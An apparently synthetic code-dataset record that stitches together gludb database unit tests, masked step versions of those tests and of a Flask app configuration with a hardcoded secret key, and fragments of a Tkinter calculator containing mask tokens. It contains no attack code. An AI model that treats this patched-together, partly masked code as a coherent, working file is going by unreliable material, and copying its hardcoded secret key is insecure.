read_obj.name = 'Pre2'
read_obj.descrip = 'Testing2'
read_obj.age = -2
s0 = SimpleStorage.from_data(orig_version(read_obj))
self.assertEquals(s.id, s0.id)
self.assertEquals('Post', s0.name)
self.assertEquals('AtItAgain', s0.descrip)
self.assertEquals(256, s0.age)
self.assertEquals({}, s0.extra_data)
# Same tests as DefaultStorageTesting but with different setUp/tearDown
class SpecificStorageTesting(DefaultStorageTesting):
    """Re-run the DefaultStorageTesting suite using a per-class DB mapping
    instead of the default database."""

    def setUp(self):
        # No default database; map SimpleStorage to its own in-memory sqlite
        in_mem = gludb.config.Database('sqlite', filename=':memory:')
        gludb.config.default_database(None)
        gludb.config.class_database(SimpleStorage, in_mem)
        SimpleStorage.ensure_table()

    def tearDown(self):
        # Remove all database configuration so the next test starts clean
        gludb.config.clear_database_config()
# Same tests as DefaultStorageTesting but with different setUp/tearDown
class PrefixedStorageTesting(DefaultStorageTesting):
    """Re-run the DefaultStorageTesting suite with an application prefix set,
    so generated table names carry the prefix."""

    PREFIX = "Prefix"

    def setUp(self):
        # No default database; map SimpleStorage explicitly and set a prefix
        gludb.config.default_database(None)
        db = gludb.config.Database('sqlite', filename=':memory:')
        gludb.config.class_database(SimpleStorage, db)
        gludb.config.set_db_application_prefix(self.PREFIX)
        SimpleStorage.ensure_table()

    def tearDown(self):
        # Clear both the database mapping and the application prefix
        gludb.config.clear_database_config()
        gludb.config.set_db_application_prefix(None)

    def test_table_has_prefix(self):
        """Table name should be '<PREFIX><separator><declared table name>'."""
        expected = ''.join([
            self.PREFIX,
            gludb.config._APPLICATION_SEP,
            SimpleStorage.__table_name__,
        ])
        self.assertEqual(SimpleStorage.get_table_name(), expected)
|
flexible
|
{
"blob_id": "7383ae97d6a1368896d05d0cafc9846c24004701",
"index": 2690,
"step-1": "<mask token>\n\n\nclass DefaultStorageTesting(unittest.TestCase):\n\n def setUp(self):\n gludb.config.default_database(gludb.config.Database('sqlite',\n filename=':memory:'))\n SimpleStorage.ensure_table()\n\n def tearDown(self):\n gludb.config.clear_database_config()\n <mask token>\n\n def assertReadable(self, obj):\n read_back = obj.__class__.find_one(obj.id)\n self.assertObjEq(obj, read_back)\n orig_ver = obj.__class__.from_data(orig_version(read_back))\n self.assertObjEq(obj, orig_ver)\n\n def assertCloseTimes(self, d1, d2, eps=0.15):\n self.assertTrue(abs((d1 - d2).total_seconds()) < eps)\n\n def assertNotCloseTimes(self, d1, d2, eps=0.15):\n self.assertTrue(abs((d1 - d2).total_seconds()) >= eps)\n\n def test_missing(self):\n self.assertIsNone(SimpleStorage.find_one('not there'))\n\n def test_table_has_prefix(self):\n self.assertEqual(SimpleStorage.get_table_name(), SimpleStorage.\n __table_name__)\n <mask token>\n <mask token>\n\n\nclass SpecificStorageTesting(DefaultStorageTesting):\n\n def setUp(self):\n gludb.config.default_database(None)\n gludb.config.class_database(SimpleStorage, gludb.config.Database(\n 'sqlite', filename=':memory:'))\n SimpleStorage.ensure_table()\n\n def tearDown(self):\n gludb.config.clear_database_config()\n\n\nclass PrefixedStorageTesting(DefaultStorageTesting):\n PREFIX = 'Prefix'\n\n def setUp(self):\n gludb.config.default_database(None)\n gludb.config.class_database(SimpleStorage, gludb.config.Database(\n 'sqlite', filename=':memory:'))\n gludb.config.set_db_application_prefix(self.PREFIX)\n SimpleStorage.ensure_table()\n\n def tearDown(self):\n gludb.config.clear_database_config()\n gludb.config.set_db_application_prefix(None)\n\n def test_table_has_prefix(self):\n expectedName = (self.PREFIX + gludb.config._APPLICATION_SEP +\n SimpleStorage.__table_name__)\n self.assertEqual(SimpleStorage.get_table_name(), expectedName)\n",
"step-2": "<mask token>\n\n\nclass MissingMapTesting(unittest.TestCase):\n <mask token>\n <mask token>\n <mask token>\n\n def test_justnomap(self):\n mapped = gludb.config.get_mapping(SimpleStorage, no_mapping_ok=True)\n self.assertIsNone(mapped)\n\n\nclass DefaultStorageTesting(unittest.TestCase):\n\n def setUp(self):\n gludb.config.default_database(gludb.config.Database('sqlite',\n filename=':memory:'))\n SimpleStorage.ensure_table()\n\n def tearDown(self):\n gludb.config.clear_database_config()\n\n def assertObjEq(self, obj1, obj2):\n self.assertTrue(compare_data_objects(obj1, obj2))\n\n def assertReadable(self, obj):\n read_back = obj.__class__.find_one(obj.id)\n self.assertObjEq(obj, read_back)\n orig_ver = obj.__class__.from_data(orig_version(read_back))\n self.assertObjEq(obj, orig_ver)\n\n def assertCloseTimes(self, d1, d2, eps=0.15):\n self.assertTrue(abs((d1 - d2).total_seconds()) < eps)\n\n def assertNotCloseTimes(self, d1, d2, eps=0.15):\n self.assertTrue(abs((d1 - d2).total_seconds()) >= eps)\n\n def test_missing(self):\n self.assertIsNone(SimpleStorage.find_one('not there'))\n\n def test_table_has_prefix(self):\n self.assertEqual(SimpleStorage.get_table_name(), SimpleStorage.\n __table_name__)\n\n def test_extra_fields(self):\n s = SimpleStorage(name='TimeTracking', descrip='FirstSave')\n s.save()\n create1 = parse_now_field(s._create_date)\n update1 = parse_now_field(s._last_update)\n self.assertCloseTimes(datetime.datetime.utcnow(), update1)\n self.assertCloseTimes(create1, update1)\n time.sleep(0.3)\n s.descrip = 'SecondSave'\n s.save()\n create2 = parse_now_field(s._create_date)\n update2 = parse_now_field(s._last_update)\n self.assertCloseTimes(datetime.datetime.utcnow(), update2)\n self.assertCloseTimes(create1, create2)\n self.assertNotCloseTimes(update1, update2)\n s2 = SimpleStorage.find_one(s.id)\n create3 = parse_now_field(s2._create_date)\n update3 = parse_now_field(s2._last_update)\n self.assertCloseTimes(create2, create3)\n 
self.assertCloseTimes(update2, update3)\n\n def test_readwrite(self):\n s = SimpleStorage(name='Pre', descrip='Testing', age=-1)\n self.assertEquals('', s.id)\n self.assertEquals('Pre', s.name)\n self.assertEquals('Testing', s.descrip)\n self.assertEquals(-1, s.age)\n self.assertEquals({}, s.extra_data)\n s.extra_data['coolness'] = {'a': 123, 'b': 456}\n s.extra_data['list-thing'] = [1, 2, 3, 4, 5, 6]\n s.extra_data['oscar'] = 'grouch'\n s.extra_data['fp'] = 42.42\n self.assertTrue(orig_version(s) is None)\n s.save()\n self.assertTrue(len(s.id) > 0)\n self.assertReadable(s)\n self.assertObjEq(s, SimpleStorage.from_data(orig_version(s)))\n s2 = SimpleStorage(id=s.id, name='Post', descrip='AtItAgain', age=256)\n s2.save()\n self.assertReadable(s2)\n all_recs = SimpleStorage.find_all()\n self.assertEqual(1, len(all_recs))\n self.assertObjEq(s2, all_recs[0])\n read_obj = all_recs[0]\n read_obj.name = 'Pre2'\n read_obj.descrip = 'Testing2'\n read_obj.age = -2\n s0 = SimpleStorage.from_data(orig_version(read_obj))\n self.assertEquals(s.id, s0.id)\n self.assertEquals('Post', s0.name)\n self.assertEquals('AtItAgain', s0.descrip)\n self.assertEquals(256, s0.age)\n self.assertEquals({}, s0.extra_data)\n\n\nclass SpecificStorageTesting(DefaultStorageTesting):\n\n def setUp(self):\n gludb.config.default_database(None)\n gludb.config.class_database(SimpleStorage, gludb.config.Database(\n 'sqlite', filename=':memory:'))\n SimpleStorage.ensure_table()\n\n def tearDown(self):\n gludb.config.clear_database_config()\n\n\nclass PrefixedStorageTesting(DefaultStorageTesting):\n PREFIX = 'Prefix'\n\n def setUp(self):\n gludb.config.default_database(None)\n gludb.config.class_database(SimpleStorage, gludb.config.Database(\n 'sqlite', filename=':memory:'))\n gludb.config.set_db_application_prefix(self.PREFIX)\n SimpleStorage.ensure_table()\n\n def tearDown(self):\n gludb.config.clear_database_config()\n gludb.config.set_db_application_prefix(None)\n\n def test_table_has_prefix(self):\n 
expectedName = (self.PREFIX + gludb.config._APPLICATION_SEP +\n SimpleStorage.__table_name__)\n self.assertEqual(SimpleStorage.get_table_name(), expectedName)\n",
"step-3": "<mask token>\n\n\nclass MissingMapTesting(unittest.TestCase):\n\n def setUp(self):\n gludb.config.default_database(None)\n\n def tearDown(self):\n gludb.config.clear_database_config()\n\n def test_failedops(self):\n\n def try_op():\n return gludb.config.get_mapping(SimpleStorage)\n self.assertRaises(ValueError, try_op)\n\n def test_justnomap(self):\n mapped = gludb.config.get_mapping(SimpleStorage, no_mapping_ok=True)\n self.assertIsNone(mapped)\n\n\nclass DefaultStorageTesting(unittest.TestCase):\n\n def setUp(self):\n gludb.config.default_database(gludb.config.Database('sqlite',\n filename=':memory:'))\n SimpleStorage.ensure_table()\n\n def tearDown(self):\n gludb.config.clear_database_config()\n\n def assertObjEq(self, obj1, obj2):\n self.assertTrue(compare_data_objects(obj1, obj2))\n\n def assertReadable(self, obj):\n read_back = obj.__class__.find_one(obj.id)\n self.assertObjEq(obj, read_back)\n orig_ver = obj.__class__.from_data(orig_version(read_back))\n self.assertObjEq(obj, orig_ver)\n\n def assertCloseTimes(self, d1, d2, eps=0.15):\n self.assertTrue(abs((d1 - d2).total_seconds()) < eps)\n\n def assertNotCloseTimes(self, d1, d2, eps=0.15):\n self.assertTrue(abs((d1 - d2).total_seconds()) >= eps)\n\n def test_missing(self):\n self.assertIsNone(SimpleStorage.find_one('not there'))\n\n def test_table_has_prefix(self):\n self.assertEqual(SimpleStorage.get_table_name(), SimpleStorage.\n __table_name__)\n\n def test_extra_fields(self):\n s = SimpleStorage(name='TimeTracking', descrip='FirstSave')\n s.save()\n create1 = parse_now_field(s._create_date)\n update1 = parse_now_field(s._last_update)\n self.assertCloseTimes(datetime.datetime.utcnow(), update1)\n self.assertCloseTimes(create1, update1)\n time.sleep(0.3)\n s.descrip = 'SecondSave'\n s.save()\n create2 = parse_now_field(s._create_date)\n update2 = parse_now_field(s._last_update)\n self.assertCloseTimes(datetime.datetime.utcnow(), update2)\n self.assertCloseTimes(create1, create2)\n 
self.assertNotCloseTimes(update1, update2)\n s2 = SimpleStorage.find_one(s.id)\n create3 = parse_now_field(s2._create_date)\n update3 = parse_now_field(s2._last_update)\n self.assertCloseTimes(create2, create3)\n self.assertCloseTimes(update2, update3)\n\n def test_readwrite(self):\n s = SimpleStorage(name='Pre', descrip='Testing', age=-1)\n self.assertEquals('', s.id)\n self.assertEquals('Pre', s.name)\n self.assertEquals('Testing', s.descrip)\n self.assertEquals(-1, s.age)\n self.assertEquals({}, s.extra_data)\n s.extra_data['coolness'] = {'a': 123, 'b': 456}\n s.extra_data['list-thing'] = [1, 2, 3, 4, 5, 6]\n s.extra_data['oscar'] = 'grouch'\n s.extra_data['fp'] = 42.42\n self.assertTrue(orig_version(s) is None)\n s.save()\n self.assertTrue(len(s.id) > 0)\n self.assertReadable(s)\n self.assertObjEq(s, SimpleStorage.from_data(orig_version(s)))\n s2 = SimpleStorage(id=s.id, name='Post', descrip='AtItAgain', age=256)\n s2.save()\n self.assertReadable(s2)\n all_recs = SimpleStorage.find_all()\n self.assertEqual(1, len(all_recs))\n self.assertObjEq(s2, all_recs[0])\n read_obj = all_recs[0]\n read_obj.name = 'Pre2'\n read_obj.descrip = 'Testing2'\n read_obj.age = -2\n s0 = SimpleStorage.from_data(orig_version(read_obj))\n self.assertEquals(s.id, s0.id)\n self.assertEquals('Post', s0.name)\n self.assertEquals('AtItAgain', s0.descrip)\n self.assertEquals(256, s0.age)\n self.assertEquals({}, s0.extra_data)\n\n\nclass SpecificStorageTesting(DefaultStorageTesting):\n\n def setUp(self):\n gludb.config.default_database(None)\n gludb.config.class_database(SimpleStorage, gludb.config.Database(\n 'sqlite', filename=':memory:'))\n SimpleStorage.ensure_table()\n\n def tearDown(self):\n gludb.config.clear_database_config()\n\n\nclass PrefixedStorageTesting(DefaultStorageTesting):\n PREFIX = 'Prefix'\n\n def setUp(self):\n gludb.config.default_database(None)\n gludb.config.class_database(SimpleStorage, gludb.config.Database(\n 'sqlite', filename=':memory:'))\n 
gludb.config.set_db_application_prefix(self.PREFIX)\n SimpleStorage.ensure_table()\n\n def tearDown(self):\n gludb.config.clear_database_config()\n gludb.config.set_db_application_prefix(None)\n\n def test_table_has_prefix(self):\n expectedName = (self.PREFIX + gludb.config._APPLICATION_SEP +\n SimpleStorage.__table_name__)\n self.assertEqual(SimpleStorage.get_table_name(), expectedName)\n",
"step-4": "<mask token>\n\n\n@DBObject(table_name='SimpleStorageTest', versioning=VersioningTypes.NONE)\nclass SimpleStorage(object):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n\nclass MissingMapTesting(unittest.TestCase):\n\n def setUp(self):\n gludb.config.default_database(None)\n\n def tearDown(self):\n gludb.config.clear_database_config()\n\n def test_failedops(self):\n\n def try_op():\n return gludb.config.get_mapping(SimpleStorage)\n self.assertRaises(ValueError, try_op)\n\n def test_justnomap(self):\n mapped = gludb.config.get_mapping(SimpleStorage, no_mapping_ok=True)\n self.assertIsNone(mapped)\n\n\nclass DefaultStorageTesting(unittest.TestCase):\n\n def setUp(self):\n gludb.config.default_database(gludb.config.Database('sqlite',\n filename=':memory:'))\n SimpleStorage.ensure_table()\n\n def tearDown(self):\n gludb.config.clear_database_config()\n\n def assertObjEq(self, obj1, obj2):\n self.assertTrue(compare_data_objects(obj1, obj2))\n\n def assertReadable(self, obj):\n read_back = obj.__class__.find_one(obj.id)\n self.assertObjEq(obj, read_back)\n orig_ver = obj.__class__.from_data(orig_version(read_back))\n self.assertObjEq(obj, orig_ver)\n\n def assertCloseTimes(self, d1, d2, eps=0.15):\n self.assertTrue(abs((d1 - d2).total_seconds()) < eps)\n\n def assertNotCloseTimes(self, d1, d2, eps=0.15):\n self.assertTrue(abs((d1 - d2).total_seconds()) >= eps)\n\n def test_missing(self):\n self.assertIsNone(SimpleStorage.find_one('not there'))\n\n def test_table_has_prefix(self):\n self.assertEqual(SimpleStorage.get_table_name(), SimpleStorage.\n __table_name__)\n\n def test_extra_fields(self):\n s = SimpleStorage(name='TimeTracking', descrip='FirstSave')\n s.save()\n create1 = parse_now_field(s._create_date)\n update1 = parse_now_field(s._last_update)\n self.assertCloseTimes(datetime.datetime.utcnow(), update1)\n self.assertCloseTimes(create1, update1)\n time.sleep(0.3)\n s.descrip = 'SecondSave'\n s.save()\n create2 = 
parse_now_field(s._create_date)\n update2 = parse_now_field(s._last_update)\n self.assertCloseTimes(datetime.datetime.utcnow(), update2)\n self.assertCloseTimes(create1, create2)\n self.assertNotCloseTimes(update1, update2)\n s2 = SimpleStorage.find_one(s.id)\n create3 = parse_now_field(s2._create_date)\n update3 = parse_now_field(s2._last_update)\n self.assertCloseTimes(create2, create3)\n self.assertCloseTimes(update2, update3)\n\n def test_readwrite(self):\n s = SimpleStorage(name='Pre', descrip='Testing', age=-1)\n self.assertEquals('', s.id)\n self.assertEquals('Pre', s.name)\n self.assertEquals('Testing', s.descrip)\n self.assertEquals(-1, s.age)\n self.assertEquals({}, s.extra_data)\n s.extra_data['coolness'] = {'a': 123, 'b': 456}\n s.extra_data['list-thing'] = [1, 2, 3, 4, 5, 6]\n s.extra_data['oscar'] = 'grouch'\n s.extra_data['fp'] = 42.42\n self.assertTrue(orig_version(s) is None)\n s.save()\n self.assertTrue(len(s.id) > 0)\n self.assertReadable(s)\n self.assertObjEq(s, SimpleStorage.from_data(orig_version(s)))\n s2 = SimpleStorage(id=s.id, name='Post', descrip='AtItAgain', age=256)\n s2.save()\n self.assertReadable(s2)\n all_recs = SimpleStorage.find_all()\n self.assertEqual(1, len(all_recs))\n self.assertObjEq(s2, all_recs[0])\n read_obj = all_recs[0]\n read_obj.name = 'Pre2'\n read_obj.descrip = 'Testing2'\n read_obj.age = -2\n s0 = SimpleStorage.from_data(orig_version(read_obj))\n self.assertEquals(s.id, s0.id)\n self.assertEquals('Post', s0.name)\n self.assertEquals('AtItAgain', s0.descrip)\n self.assertEquals(256, s0.age)\n self.assertEquals({}, s0.extra_data)\n\n\nclass SpecificStorageTesting(DefaultStorageTesting):\n\n def setUp(self):\n gludb.config.default_database(None)\n gludb.config.class_database(SimpleStorage, gludb.config.Database(\n 'sqlite', filename=':memory:'))\n SimpleStorage.ensure_table()\n\n def tearDown(self):\n gludb.config.clear_database_config()\n\n\nclass PrefixedStorageTesting(DefaultStorageTesting):\n PREFIX = 'Prefix'\n\n 
def setUp(self):\n gludb.config.default_database(None)\n gludb.config.class_database(SimpleStorage, gludb.config.Database(\n 'sqlite', filename=':memory:'))\n gludb.config.set_db_application_prefix(self.PREFIX)\n SimpleStorage.ensure_table()\n\n def tearDown(self):\n gludb.config.clear_database_config()\n gludb.config.set_db_application_prefix(None)\n\n def test_table_has_prefix(self):\n expectedName = (self.PREFIX + gludb.config._APPLICATION_SEP +\n SimpleStorage.__table_name__)\n self.assertEqual(SimpleStorage.get_table_name(), expectedName)\n",
"step-5": "\"\"\"Testing data storage functionality in gludb.simple (see simple_tests.py for\ntesting of the rest of gludb.simple functionality)\"\"\"\n\nimport unittest\nimport datetime\nimport time\n\nimport gludb.config\n\nfrom gludb.versioning import VersioningTypes\nfrom gludb.data import orig_version\nfrom gludb.simple import DBObject, Field\nfrom gludb.utils import parse_now_field\n\nfrom utils import compare_data_objects\n\n\n@DBObject(table_name='SimpleStorageTest', versioning=VersioningTypes.NONE)\nclass SimpleStorage(object):\n name = Field('default name')\n descrip = Field()\n age = Field(42)\n extra_data = Field(dict)\n\n\n# Same tests as DefaultStorageTesting but with differnt setUp/tearDown\nclass MissingMapTesting(unittest.TestCase):\n def setUp(self):\n gludb.config.default_database(None) # no default database\n\n def tearDown(self):\n # Undo any database setup\n gludb.config.clear_database_config()\n\n def test_failedops(self):\n def try_op():\n return gludb.config.get_mapping(SimpleStorage)\n self.assertRaises(ValueError, try_op)\n\n def test_justnomap(self):\n mapped = gludb.config.get_mapping(SimpleStorage, no_mapping_ok=True)\n self.assertIsNone(mapped)\n\n\nclass DefaultStorageTesting(unittest.TestCase):\n def setUp(self):\n gludb.config.default_database(gludb.config.Database(\n 'sqlite',\n filename=':memory:'\n ))\n SimpleStorage.ensure_table()\n\n def tearDown(self):\n # Undo any database setup\n gludb.config.clear_database_config()\n\n def assertObjEq(self, obj1, obj2):\n self.assertTrue(compare_data_objects(obj1, obj2))\n\n def assertReadable(self, obj):\n read_back = obj.__class__.find_one(obj.id)\n self.assertObjEq(obj, read_back)\n orig_ver = obj.__class__.from_data(orig_version(read_back))\n self.assertObjEq(obj, orig_ver)\n\n def assertCloseTimes(self, d1, d2, eps=0.15):\n self.assertTrue(abs((d1 - d2).total_seconds()) < eps)\n\n def assertNotCloseTimes(self, d1, d2, eps=0.15):\n self.assertTrue(abs((d1 - d2).total_seconds()) >= 
eps)\n\n def test_missing(self):\n self.assertIsNone(SimpleStorage.find_one('not there'))\n \n def test_table_has_prefix(self):\n self.assertEqual(SimpleStorage.get_table_name(), SimpleStorage.__table_name__)\n\n def test_extra_fields(self):\n s = SimpleStorage(name='TimeTracking', descrip='FirstSave')\n s.save()\n\n create1 = parse_now_field(s._create_date)\n update1 = parse_now_field(s._last_update)\n\n self.assertCloseTimes(datetime.datetime.utcnow(), update1)\n self.assertCloseTimes(create1, update1)\n\n # Sucks, but we need to space out our timestamps\n time.sleep(0.3)\n\n s.descrip = 'SecondSave'\n s.save()\n\n create2 = parse_now_field(s._create_date)\n update2 = parse_now_field(s._last_update)\n\n self.assertCloseTimes(datetime.datetime.utcnow(), update2)\n self.assertCloseTimes(create1, create2)\n self.assertNotCloseTimes(update1, update2)\n\n s2 = SimpleStorage.find_one(s.id)\n create3 = parse_now_field(s2._create_date)\n update3 = parse_now_field(s2._last_update)\n\n # Note that we DON'T check for string equality - that's because\n # _last_update is updated every time the instance method to_data is\n # called. 
See simple.md for extra details on auto fields\n self.assertCloseTimes(create2, create3)\n self.assertCloseTimes(update2, update3)\n\n def test_readwrite(self):\n s = SimpleStorage(name='Pre', descrip='Testing', age=-1)\n self.assertEquals('', s.id)\n self.assertEquals('Pre', s.name)\n self.assertEquals('Testing', s.descrip)\n self.assertEquals(-1, s.age)\n self.assertEquals({}, s.extra_data)\n\n s.extra_data['coolness'] = {'a': 123, 'b': 456}\n s.extra_data['list-thing'] = [1, 2, 3, 4, 5, 6]\n s.extra_data['oscar'] = 'grouch'\n s.extra_data['fp'] = 42.42\n\n self.assertTrue(orig_version(s) is None)\n\n s.save()\n self.assertTrue(len(s.id) > 0)\n self.assertReadable(s)\n # Saved - so should have a prev version that is identical\n self.assertObjEq(s, SimpleStorage.from_data(orig_version(s)))\n\n s2 = SimpleStorage(id=s.id, name='Post', descrip='AtItAgain', age=256)\n s2.save()\n self.assertReadable(s2)\n\n all_recs = SimpleStorage.find_all()\n self.assertEqual(1, len(all_recs))\n self.assertObjEq(s2, all_recs[0])\n\n # Change the object we read and then insure that the pervious version\n # saved on load is correct\n read_obj = all_recs[0]\n read_obj.name = 'Pre2'\n read_obj.descrip = 'Testing2'\n read_obj.age = -2\n\n s0 = SimpleStorage.from_data(orig_version(read_obj))\n self.assertEquals(s.id, s0.id)\n self.assertEquals('Post', s0.name)\n self.assertEquals('AtItAgain', s0.descrip)\n self.assertEquals(256, s0.age)\n self.assertEquals({}, s0.extra_data)\n\n\n# Same tests as DefaultStorageTesting but with differnt setUp/tearDown\nclass SpecificStorageTesting(DefaultStorageTesting):\n def setUp(self):\n gludb.config.default_database(None) # no default database\n gludb.config.class_database(SimpleStorage, gludb.config.Database(\n 'sqlite',\n filename=':memory:'\n ))\n SimpleStorage.ensure_table()\n\n def tearDown(self):\n # Undo any database setup\n gludb.config.clear_database_config()\n\n \n# Same tests as DefaultStorageTesting but with differnt setUp/tearDown\nclass 
PrefixedStorageTesting(DefaultStorageTesting):\n PREFIX = \"Prefix\"\n \n def setUp(self):\n gludb.config.default_database(None) # no default database\n gludb.config.class_database(SimpleStorage, gludb.config.Database(\n 'sqlite',\n filename=':memory:'\n ))\n gludb.config.set_db_application_prefix(self.PREFIX)\n SimpleStorage.ensure_table()\n\n def tearDown(self):\n # Undo any database setup\n gludb.config.clear_database_config()\n gludb.config.set_db_application_prefix(None)\n \n def test_table_has_prefix(self):\n expectedName = self.PREFIX + gludb.config._APPLICATION_SEP + SimpleStorage.__table_name__\n self.assertEqual(SimpleStorage.get_table_name(), expectedName)",
"step-ids": [
16,
21,
24,
25,
28
]
}
|
[
16,
21,
24,
25,
28
] |
<|reserved_special_token_0|>
@app.route('/')
def redirect_to_swagger():
return redirect('/swagger', 302)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
with open(path / '../schemas.json', 'r') as fp:
schemas = load(fp)
with open(path / '../config.json', 'r') as fp:
config = load(fp)
<|reserved_special_token_0|>
@app.route('/')
def redirect_to_swagger():
return redirect('/swagger', 302)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
path = Path(__file__).parent
db = SQLAlchemy()
with open(path / '../schemas.json', 'r') as fp:
schemas = load(fp)
with open(path / '../config.json', 'r') as fp:
config = load(fp)
app = Flask(__name__, template_folder='templates')
app.config['SECRET_KEY'] = '3205fc85cd004116bfe218f14192e49a'
app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///app.db'
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
app.config['SWAGGER_UI_OAUTH_CLIENT_ID'] = 'documentation'
domain = app.config.get('SERVER_NAME')
port = environ.get('PORT', config['default_port'])
redirect_uri = environ.get('REDIRECT_URI', config['redirect_uri'])
client_uri = environ.get('CLIENT_URI', config['client_uri'])
client_s3 = boto3.resource('s3')
@app.route('/')
def redirect_to_swagger():
return redirect('/swagger', 302)
<|reserved_special_token_1|>
from os import environ
import boto3
from flask import Flask, redirect
from flask_sqlalchemy import SQLAlchemy
from json import load
from pathlib import Path
path = Path(__file__).parent
db = SQLAlchemy()
with open(path / '../schemas.json', 'r') as fp:
schemas = load(fp)
with open(path / '../config.json', 'r') as fp:
config = load(fp)
app = Flask(__name__, template_folder='templates')
app.config['SECRET_KEY'] = '3205fc85cd004116bfe218f14192e49a'
app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///app.db'
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
app.config['SWAGGER_UI_OAUTH_CLIENT_ID'] = 'documentation'
domain = app.config.get('SERVER_NAME')
port = environ.get('PORT', config['default_port'])
redirect_uri = environ.get('REDIRECT_URI', config['redirect_uri'])
client_uri = environ.get('CLIENT_URI', config['client_uri'])
client_s3 = boto3.resource('s3')
@app.route('/')
def redirect_to_swagger():
return redirect('/swagger', 302)
<|reserved_special_token_1|>
from os import environ
import boto3
from flask import Flask, redirect
from flask_sqlalchemy import SQLAlchemy
from json import load
from pathlib import Path
path = Path(__file__).parent
db = SQLAlchemy()
with open(path / "../schemas.json", "r") as fp:
schemas = load(fp)
with open(path / "../config.json", "r") as fp:
config = load(fp)
app = Flask(__name__, template_folder="templates")
app.config["SECRET_KEY"] = "3205fc85cd004116bfe218f14192e49a"
app.config["SQLALCHEMY_DATABASE_URI"] = "sqlite:///app.db"
app.config["SQLALCHEMY_TRACK_MODIFICATIONS"] = False
app.config["SWAGGER_UI_OAUTH_CLIENT_ID"] = "documentation"
domain = app.config.get("SERVER_NAME")
port = environ.get("PORT", config["default_port"])
redirect_uri = environ.get("REDIRECT_URI", config["redirect_uri"])
client_uri = environ.get("CLIENT_URI", config["client_uri"])
client_s3 = boto3.resource("s3")
@app.route("/")
def redirect_to_swagger():
return redirect("/swagger", 302)
|
flexible
|
{
"blob_id": "631904ae96584bd19756f9335175a419397ac252",
"index": 8562,
"step-1": "<mask token>\n\n\n@app.route('/')\ndef redirect_to_swagger():\n return redirect('/swagger', 302)\n",
"step-2": "<mask token>\nwith open(path / '../schemas.json', 'r') as fp:\n schemas = load(fp)\nwith open(path / '../config.json', 'r') as fp:\n config = load(fp)\n<mask token>\n\n\n@app.route('/')\ndef redirect_to_swagger():\n return redirect('/swagger', 302)\n",
"step-3": "<mask token>\npath = Path(__file__).parent\ndb = SQLAlchemy()\nwith open(path / '../schemas.json', 'r') as fp:\n schemas = load(fp)\nwith open(path / '../config.json', 'r') as fp:\n config = load(fp)\napp = Flask(__name__, template_folder='templates')\napp.config['SECRET_KEY'] = '3205fc85cd004116bfe218f14192e49a'\napp.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///app.db'\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\napp.config['SWAGGER_UI_OAUTH_CLIENT_ID'] = 'documentation'\ndomain = app.config.get('SERVER_NAME')\nport = environ.get('PORT', config['default_port'])\nredirect_uri = environ.get('REDIRECT_URI', config['redirect_uri'])\nclient_uri = environ.get('CLIENT_URI', config['client_uri'])\nclient_s3 = boto3.resource('s3')\n\n\n@app.route('/')\ndef redirect_to_swagger():\n return redirect('/swagger', 302)\n",
"step-4": "from os import environ\nimport boto3\nfrom flask import Flask, redirect\nfrom flask_sqlalchemy import SQLAlchemy\nfrom json import load\nfrom pathlib import Path\npath = Path(__file__).parent\ndb = SQLAlchemy()\nwith open(path / '../schemas.json', 'r') as fp:\n schemas = load(fp)\nwith open(path / '../config.json', 'r') as fp:\n config = load(fp)\napp = Flask(__name__, template_folder='templates')\napp.config['SECRET_KEY'] = '3205fc85cd004116bfe218f14192e49a'\napp.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///app.db'\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\napp.config['SWAGGER_UI_OAUTH_CLIENT_ID'] = 'documentation'\ndomain = app.config.get('SERVER_NAME')\nport = environ.get('PORT', config['default_port'])\nredirect_uri = environ.get('REDIRECT_URI', config['redirect_uri'])\nclient_uri = environ.get('CLIENT_URI', config['client_uri'])\nclient_s3 = boto3.resource('s3')\n\n\n@app.route('/')\ndef redirect_to_swagger():\n return redirect('/swagger', 302)\n",
"step-5": "from os import environ\n\nimport boto3\nfrom flask import Flask, redirect\nfrom flask_sqlalchemy import SQLAlchemy\nfrom json import load\nfrom pathlib import Path\n\n\npath = Path(__file__).parent\n\n\ndb = SQLAlchemy()\n\nwith open(path / \"../schemas.json\", \"r\") as fp:\n schemas = load(fp)\n\nwith open(path / \"../config.json\", \"r\") as fp:\n config = load(fp)\n\napp = Flask(__name__, template_folder=\"templates\")\napp.config[\"SECRET_KEY\"] = \"3205fc85cd004116bfe218f14192e49a\"\napp.config[\"SQLALCHEMY_DATABASE_URI\"] = \"sqlite:///app.db\"\napp.config[\"SQLALCHEMY_TRACK_MODIFICATIONS\"] = False\napp.config[\"SWAGGER_UI_OAUTH_CLIENT_ID\"] = \"documentation\"\ndomain = app.config.get(\"SERVER_NAME\")\n\n\nport = environ.get(\"PORT\", config[\"default_port\"])\nredirect_uri = environ.get(\"REDIRECT_URI\", config[\"redirect_uri\"])\nclient_uri = environ.get(\"CLIENT_URI\", config[\"client_uri\"])\n\nclient_s3 = boto3.resource(\"s3\")\n\n\n@app.route(\"/\")\ndef redirect_to_swagger():\n return redirect(\"/swagger\", 302)\n\n\n\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
<|reserved_special_token_0|>
def button_add():
global first_num
global math
math = 'addition'
first_num = e.get()
e.delete(0, END)
<|reserved_special_token_0|>
def button_sub():
global first_num
global math
math = 'subtraction'
first_num = e.get()
e.delete(0, END)
def button_div():
global first_num
global math
math = 'division'
first_num = e.get()
e.delete(0, END)
<|reserved_special_token_0|>
def clear():
e.delete(0, END)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def button_click(number):
digit = e.get()
e.delete(0, END)
e.insert(0, str(digit) + str(number))
def button_add():
global first_num
global math
math = 'addition'
first_num = e.get()
e.delete(0, END)
<|reserved_special_token_0|>
def button_sub():
global first_num
global math
math = 'subtraction'
first_num = e.get()
e.delete(0, END)
def button_div():
global first_num
global math
math = 'division'
first_num = e.get()
e.delete(0, END)
<|reserved_special_token_0|>
def clear():
e.delete(0, END)
<|reserved_special_token_0|>
